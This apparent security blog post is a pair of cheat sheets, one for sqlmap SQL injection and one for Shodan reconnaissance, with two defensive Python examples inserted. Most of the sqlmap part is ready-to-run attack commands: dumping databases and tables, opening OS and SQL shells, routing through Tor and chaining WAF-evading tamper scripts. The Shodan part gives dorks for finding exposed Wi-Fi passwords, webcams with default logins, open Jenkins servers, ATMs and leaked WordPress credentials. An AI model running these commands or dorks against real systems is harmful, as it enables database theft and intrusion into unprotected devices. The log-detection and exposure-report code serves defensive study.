
Sunday, April 11, 2021

 

SQLMap Cheat Sheet 

sqlmap is one of the best SQL injection tools. In this SQLMap cheat sheet, I will describe all the SQLMap commands that can be very helpful for testing for SQL injection vulnerabilities.

I am sharing the SQLMap cheat sheet I created for my personal use. I hope the included payloads will help you with your penetration testing activities.

sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

Simple Usage

If you don't know anything about the target site, start with the plain command and observe whether sqlmap finds anything interesting for you.

sqlmap -u "https://target_site.com/page/"

Automatic GET request parameter

sqlmap -u "https://target_site.com/page?p1=value1&p2=value2"

Specify the GET request parameters to Exploit

You can specify which parameter sqlmap should check or exploit for SQL injection with the -p flag.

sqlmap -u "https://target_site.com/page?p1=value1&p2=value2" -p p1

Use POST requests (Test All parameters)

sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2"

SQLMap Request file as input

You can pass a file containing the raw HTTP request; the quickest way to get one is to copy it from Burp Suite.

sqlmap -r request.txt

You can still name the target parameter with -p; otherwise sqlmap recognizes and tests all the parameters found in the request.

Specify Custom Position in HTTP request file

You can use an asterisk (*) to mark which parameter, or which exact position in the request, should be tested. Any part of the request can be marked this way.
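As an added illustration, not from the original post, here is a minimal request file with the marker placed on p1; the host, cookie value and parameter values are the same placeholders used elsewhere in this cheat sheet:

```http
POST /page/ HTTP/1.1
Host: target_site.com
Content-Type: application/x-www-form-urlencoded
Cookie: SESSID=Session_Cookie_Value

p1=value1*&p2=value2
```

Run it with sqlmap -r request.txt; sqlmap notices the custom injection marker, asks whether to process it, and then tests only the marked position, so p2 is left alone.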

Use Authenticated Session With Cookie

sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2" --cookie="Session_Cookie_Value"

Use Authenticated Session with Auth Headers

sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2" --headers="Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l"

Basic Authentication

sqlmap -u "https://target_site.com/page/" --data="p1=value1&p2=value2" --auth-type=basic --auth-cred=username:password

Use Previously created Session as SQLmap input (-s)

Once sqlmap finds an injection point, it automatically creates a session file (.sqlite) for later use. If you want to run other commands later, you can pass the session file directly; this saves the time of retrying all the possible payloads to re-identify the vulnerability.

sqlmap -u "https://target_site.com/page?p1=value1" -s SESSION-FILE.sqlite --dbs

The session file is found under the sqlmap tool's output directory.


Post Exploitation Commands

If the SQL injection vulnerability is confirmed, you can use the following commands to exploit it.

List the Databases

sqlmap -u "https://target_site.com/page?p1=value1" --dbs

List Tables of Database TARGET_DB

sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB --tables

List Columns of Table TARGET_TABLE of Database TARGET_DB

sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB -T TARGET_TABLE --columns

Dump Specific Data of Columns of Table TARGET_TABLE of Database TARGET_DB

sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB -T TARGET_TABLE -C "Col1,Col2" --dump

Fully Dump Table TARGET_TABLE of Database TARGET_DB

sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB -T TARGET_TABLE --dump

Dump full Database

sqlmap -u "https://target_site.com/page?p1=value1" -D TARGET_DB --dump

Custom SQL query

sqlmap -u "https://target_site.com/page?p1=value1" --sql-query "SELECT * FROM TARGET_DB.TARGET_TABLE;"

Get OS Shell

sqlmap -u "https://target_site.com/page?p1=value1" --os-shell

Get SQL shell

sqlmap -u "https://target_site.com/page?p1=value1" --sql-shell

SQLMap Proxy

Proxy through Burpsuite

sqlmap -u "https://target_site.com/page?p1=value1" --proxy="http://127.0.0.1:8080/"

Use Tor Socks5 proxy

sqlmap -u "https://target_site.com/page?p1=value1" --tor --tor-type=SOCKS5 --check-tor --dbs

Extra

Specify The Database Type

sqlmap -u "https://target_site.com/page?p1=value1" --dbms=mysql

sqlmap supports many other DBMS types, such as MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, Percona, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, etc.

Attack Techniques

--technique=TECH takes one or more of the letters BEUSTQ to control which injection techniques are attempted:

  • B: Boolean-based blind
  • E: Error-based
  • U: Union query-based
  • S: Stacked queries
  • T: Time-based blind
  • Q: Inline queries

sqlmap -u "https://target_site.com/page?p1=value1" --technique=BEUSTQ

Specify the Level and Risk of Tests

You can control how thorough and how aggressive the tests are with two flags:

  1. --level=LEVEL    Level of tests to perform (1-5, default 1)
  2. --risk=RISK      Risk of tests to perform (0-3, default 1)

sqlmap -u "https://target_site.com/page?p1=value1" --risk=3 --level=5

Option: --risk

This option takes an argument specifying the risk of the tests to perform. There are three risk values.

--risk=1: the default value, suitable for the majority of SQL injection points.

--risk=2: adds heavy-query time-based SQL injection tests to the default set.

--risk=3: additionally adds OR-based SQL injection tests.

Option: --level

When --level is >= 2, sqlmap also tests HTTP Cookie header values. When it is >= 3, it also tests the HTTP User-Agent and HTTP Referer header values for SQL injection.
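Because sqlmap at these levels also injects into the Cookie, User-Agent and Referer headers, a defender's logging has to capture those headers to see the probes. The Python below is an added example, not part of the cheat sheet or of sqlmap: it runs two simple detections over constructed access-log lines in the Apache/nginx combined format, a User-Agent that identifies sqlmap, and a burst of requests from one client to one path with many distinct query strings, which is what automated parameter testing looks like from the server side. The log lines, addresses, version string and thresholds are all made up for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" log format (assumed by this example). It carries the
# Referer and User-Agent headers that sqlmap tests at --level 3 and above, but
# not the Cookie header; log that separately if --level 2 probes matter to you.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: 203.0.113.9 drives a scanner against /page, 198.51.100.4 is
# an ordinary visitor. Addresses, values and the sqlmap version are made up.
SAMPLE_LOG = """\
198.51.100.4 - - [11/Apr/2021:10:00:00 +0000] "GET /page?p1=value1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Apr/2021:10:00:01 +0000] "GET /page?p1=value1 HTTP/1.1" 200 512 "-" "sqlmap/1.5.4#stable (http://sqlmap.org)"
203.0.113.9 - - [11/Apr/2021:10:00:02 +0000] "GET /page?p1=value1%27 HTTP/1.1" 500 120 "-" "sqlmap/1.5.4#stable (http://sqlmap.org)"
203.0.113.9 - - [11/Apr/2021:10:00:02 +0000] "GET /page?p1=value1%22 HTTP/1.1" 500 120 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Apr/2021:10:00:03 +0000] "GET /page?p1=value1%29 HTTP/1.1" 500 120 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Apr/2021:10:00:04 +0000] "GET /page?p1=value1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Apr/2021:10:00:05 +0000] "GET /page?p1=value1%20AND%201%3D2 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
198.51.100.4 - - [11/Apr/2021:10:00:30 +0000] "GET /page?p1=value2 HTTP/1.1" 200 530 "https://target_site.com/" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict; return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FORMAT)
    rec["path"], _, rec["query"] = rec["target"].partition("?")
    return rec


def analyze(log_text, window_seconds=10, burst_threshold=5):
    """Run both detections over the log text.

    Returns {"tool_user_agent": set of client IPs whose User-Agent names sqlmap,
             "bursts": [(ip, path, distinct_queries, server_errors), ...]}.
    A burst is >= burst_threshold distinct query strings from one IP to one path
    inside any window of window_seconds; server_errors counts the 5xx replies in
    that window, a secondary signal for error-based probing.
    """
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    tool_ua = {r["ip"] for r in records if "sqlmap" in r["ua"].lower()}

    by_key = defaultdict(list)
    for r in records:
        by_key[(r["ip"], r["path"])].append(r)

    bursts = []
    for (ip, path), recs in by_key.items():
        recs.sort(key=lambda r: r["ts"])
        for i, first in enumerate(recs):
            window = [r for r in recs[i:]
                      if (r["ts"] - first["ts"]).total_seconds() <= window_seconds]
            distinct = {r["query"] for r in window}
            if len(distinct) >= burst_threshold:
                errors = sum(1 for r in window if r["status"].startswith("5"))
                bursts.append((ip, path, len(distinct), errors))
                break  # report each (ip, path) pair once
    return {"tool_user_agent": tool_ua, "bursts": bursts}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    print("clients using a sqlmap User-Agent:", sorted(result["tool_user_agent"]))
    for ip, path, distinct, errors in result["bursts"]:
        print(f"burst: {ip} -> {path}: {distinct} distinct queries, {errors} server errors")
```

The User-Agent check is the cheap signal and is also the weakest, since a client can send any User-Agent it likes; the burst of distinct query strings against one path, together with the run of 5xx responses, is what survives a changed User-Agent and is worth alerting on.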

Use Default Options for the process

Use the --batch flag to accept all the default options; it is meant for non-interactive sessions. With --batch, sqlmap will not ask you for (Y/N) choices and instead picks the default answer for each prompt.

sqlmap -u "https://target_site.com/page?p1=value1" --batch

--force-ssl flag

Force SQLmap to use SSL or TLS for its requests.

Error: Can't establish SSL connection

If you get this error during testing, use the --force-ssl flag to force SQLMap to use SSL or TLS.

Tamper Scripts

Tamper scripts modify the payload, for example to bypass a WAF. You can chain multiple tamper scripts at once with the --tamper flag.

sqlmap -u "https://target_site.com/page?p1=value1" --tamper=charencode

For general-purpose use:

--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL:

--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL:

--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

Or you can write your own custom tamper script to handle payloads that must be encrypted or hashed (AES, DES, hashing, etc.). I have written a separate article on this: Make Custom SQLMAP tamper script for encrypted data Testing.

Conclusion:

SQLMap is a fantastic tool for SQL injection attacks. Combining the flags from the cheat sheet above, we can build a general-purpose command that uses the most useful ones:

sqlmap -u "https://target_site.com/page/" --proxy="http://127.0.0.1:8080/" --cookie="SESSID=lred0jr6na1vmci;" --data="p1=value1" -p p1 --level=5 --risk=3 --dbms=mysql --technique=BEUSTQ --force-ssl

As always, I hope you found this SQLMap cheat sheet useful. Guys, feel free to show the post some love and share the cheat sheet with your friends and colleagues. I will also post a detailed SQLMap tutorial soon.

Shodan Cheat Sheet: Keep IoT in your Pocket

These Shodan dorks will help you use the Shodan search engine like a pro and get targeted results easily.

It is very different from content search engines like Google, Bing, or Yahoo. Those crawl web pages and index their content for searching, while Shodan interrogates ports, grabs the resulting banners, and indexes the banners for searching.

If you are in the cybersecurity field, you should already be familiar with the Shodan search engine. Shodan is an IoT search engine that finds specific types of computers (routers, webcams, servers, etc.) on the internet using a variety of filters. It's a great resource for passive reconnaissance on a target or as a measuring tool.

Just open https://shodan.io/ and start running the queries from this Shodan cheat sheet.

Shodan Cheat Sheet

Server:

Find devices or servers whose banner contains a specific Server header value. You can use it to look for vulnerable server versions.

server: "apache 2.2.3"

or you can use the string directly as the query:

apache 2.2.3

hostname:

Find devices with a specific hostname worldwide. A hostname is a label assigned to a device connected to a network, used to identify that device in various kinds of communication, such as on the World Wide Web. You can combine several of the filters in this Shodan cheat sheet to narrow your search.

server: "apache" hostname:"google"

net:

Find devices or machines by IP address or by CIDR range (/x). This filter can also be used to find a particular IP range, or a single IP address with its subnet mask.

net:34.98.0.0/16

os:

Find devices based on their operating system. You can list all the devices running a specific operating system, which helps penetration testers find potentially vulnerable machines.

os:"windows xp"

port:

Find devices based on open ports. The port filter narrows the search to machines with specific open ports.

proftpd port:21

org:

This filter lets you locate the devices of a specific organization.

org:"Google"

You can combine the org filter with the other filters in this Shodan cheat sheet to narrow the search and sort through millions of results.

city:

Find devices in a particular city. For example, to narrow the search to Mumbai only, use:

city:"Mumbai"

country:

Find devices in a particular country. For example, to narrow the search to India only, use:

country:"IN"

geo:

Find devices by geographic coordinates: give a latitude and longitude, optionally with a radius, to return the devices within that area.

geo:"48.1667,-100.1667"

before/after:

The 'after' and 'before' filters help you find devices seen after and before a particular date.

The format allowed is dd/mm/yyyy

nginx before:13/04/2020 after:13/04/2018

has_screenshot

This filter returns only results that have a screenshot available.

has_screenshot:true city:"George Town"

Wifi Passwords:

Helps find cleartext Wi-Fi passwords in Shodan.

html:"def_wirelesspassword"

Surveillance Cams:

Get the data for surveillance cams with username: admin and password: password

NETSurveillance uc-httpd

Or you can also use the query below:

Android Webcam Server

Citrix:

Find Citrix Gateway.

title:"citrix gateway"

Windows RDP Password:

Results may still require a secondary Windows authentication.

"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"

Misconfigured WordPress Sites:

The wp-config.php file, if it can be accessed, gives out the database credentials.

http.html:"* The wp-config.php creation script uses this file"

An exposed main WordPress configuration file leaks sensitive information such as the database credentials or the AUTH_KEY of the misconfigured site.

Mongo DB servers:

This dork returns information about MongoDB servers.

"MongoDB Server Information" port:27017 -authentication

FTP servers allowing anonymous access:

Finds FTP servers that allow fully anonymous access.

"220" "230 Login successful." port:21

Jenkins:

Find all Jenkins dashboards with unrestricted access.

x-jenkins 200

Open ATM:

This query looks for exposed NCR (ATM) devices with port 161 open.

NCR port:"161"

Android Debug Bridge:

Find Android Debug Bridge instances exposed on port 5555.

"Android Debug Bridge" "Device" port:5555

Telnet Access:

Find devices that require a password for telnet access.

port:23 console gateway

Ethereum Miners:

Shows miners running ETH.

"ETH - Total speed"

Shodan Command-Line Interface Cheat Sheet

The Shodan command-line interface (CLI) is a command-line client for the Shodan IoT search engine. You can install it with a simple pip command:

$  pip install shodan

Once the shodan tool is installed, initialize it with your private API key, which you can get from your Shodan account settings:

$  shodan init PRIVATE_API_KEY

Shodan CLI Cheat Sheet

Running shodan with no arguments prints the help. This is the most useful starting point: it gives you the full list of commands that can be used further in the recon process.

$  shodan

myip

This command prints your public, internet-facing IP address.

$ shodan myip
49.34.120.0

host

Get the information about the host. You can get information like where it’s located, what ports are open, and which organization owns the IP.

$  shodan host 63.X.X.X

count

Returns the number of results for a search query.

$  shodan count Apache Tomcat/8.5.13
106
$  shodan count port:22 country:IN
348612

search

The search command lets you query Shodan and view the results in a terminal-friendly, user-friendly way. By default it displays the IP, port, hostnames and data fields. Use the --fields parameter to specify the fields you want in the output.

*Note: You need “Shodan Pro” to use this command.

$  shodan search --fields ip_str,port,org Apache Tomcat/8.5.13

download

Searches Shodan and downloads the results into a file of JSON-formatted banner lines.

By default the number of results is limited to 1,000; if you want to download more than that, use the --limit flag with your query.

The saved file can be processed afterwards with the parse command.

$  shodan download Apache Tomcat/8.5.13

parse

Use the parse command to analyze a file generated with the download command. It lets you pick out the fields you are interested in and convert the JSON into a user-defined format.

Use the --fields flag to specify the fields you want, and the --separator flag to set a user-defined separator between those fields.

$  shodan parse --fields ip_str,port,org --separator " - " Apache.json.gz
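As an added example, not part of the original post or of the Shodan project, the Python below shows what the download and parse commands give you and what a defender can do with it: it writes a few constructed banners in the gzip JSON-lines format that shodan download produces, reads them back, reproduces the parse --fields/--separator output for one banner, and then turns the data into an exposure report for a single organization, listing the IPs on which services that should not be reachable from the internet (telnet, FTP, RDP, MongoDB, ADB, the same services several dorks above look for) were seen. The banners, addresses, organization names and the risky-port set are assumptions made for the demo; ip_str, port and org are the field names this cheat sheet already uses, and hostnames and data are the standard Shodan banner fields.

```python
import gzip
import json
import os
import tempfile
from collections import Counter

# Services this example treats as "should not be internet-facing". The set is an
# assumption for the demo, built from the services the cheat sheet's dorks look for.
RISKY_PORTS = {21: "ftp", 23: "telnet", 3389: "rdp", 5555: "adb", 27017: "mongodb"}

# Constructed banners in the shape `shodan download` writes (one JSON object per
# line, gzip-compressed). Addresses, hostnames and organizations are made up.
SAMPLE_BANNERS = [
    {"ip_str": "203.0.113.10", "port": 443, "transport": "tcp", "org": "Example Corp",
     "hostnames": ["www.example.com"], "data": "HTTP/1.1 200 OK\r\nServer: nginx\r\n"},
    {"ip_str": "203.0.113.10", "port": 23, "transport": "tcp", "org": "Example Corp",
     "hostnames": ["gw.example.com"], "data": "login: "},
    {"ip_str": "203.0.113.11", "port": 27017, "transport": "tcp", "org": "Example Corp",
     "hostnames": [], "data": "MongoDB Server Information\n"},
    {"ip_str": "198.51.100.5", "port": 21, "transport": "tcp", "org": "Other Org",
     "hostnames": [], "data": "220 FTP ready\r\n"},
]


def write_banner_file(path, banners):
    """Write banners as gzip-compressed JSON lines, the format `shodan download` produces."""
    with gzip.open(path, "wt", encoding="utf-8") as fh:
        for banner in banners:
            fh.write(json.dumps(banner) + "\n")


def load_banners(path):
    """Read a download file back into a list of banner dicts, skipping blank lines."""
    with gzip.open(path, "rt", encoding="utf-8") as fh:
        return [json.loads(line) for line in fh if line.strip()]


def format_fields(banner, fields, separator=" - "):
    """Equivalent of `shodan parse --fields ... --separator ...` for one banner."""
    return separator.join(str(banner.get(field, "")) for field in fields)


def port_counts(banners):
    """How many banners were seen per port, a quick breakdown like `shodan count`."""
    return Counter(b["port"] for b in banners)


def exposure_report(banners, org):
    """Map each IP belonging to `org` to the risky services seen on it (sorted by port)."""
    report = {}
    for b in banners:
        if b.get("org") != org or b["port"] not in RISKY_PORTS:
            continue
        report.setdefault(b["ip_str"], []).append((b["port"], RISKY_PORTS[b["port"]]))
    return {ip: sorted(ports) for ip, ports in report.items()}


def demo():
    """Round-trip the sample through a real file and return the report for Example Corp."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "Example.json.gz")
        write_banner_file(path, SAMPLE_BANNERS)
        banners = load_banners(path)
    return exposure_report(banners, "Example Corp")


if __name__ == "__main__":
    for ip, services in demo().items():
        print(ip, ", ".join(f"{port}/{name}" for port, name in services))
```

Point load_banners at a file produced by shodan download for your own address space (the net and org filters above are the natural queries) and the report becomes a first pass at an external asset inventory; a hit means the port answered when Shodan scanned it, not that the service is unauthenticated, so each entry still needs checking by hand.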

*Note: You need “Shodan Pro” to use some of above shodan command line commands.

Final Words,

You can use all these Shodan filters in your recon research and penetration testing work. Combining multiple filters turns them into advanced, precise searches.

IMPORTANT THINGS TO REMEMBER

– You will not misuse the information to gain unauthorized access.
– This Shodan Cheat Sheet is shared with you guys for educational purposes and your penetration testing work only.
– This information shall only be used to expand knowledge and not for any type of malicious attacks.
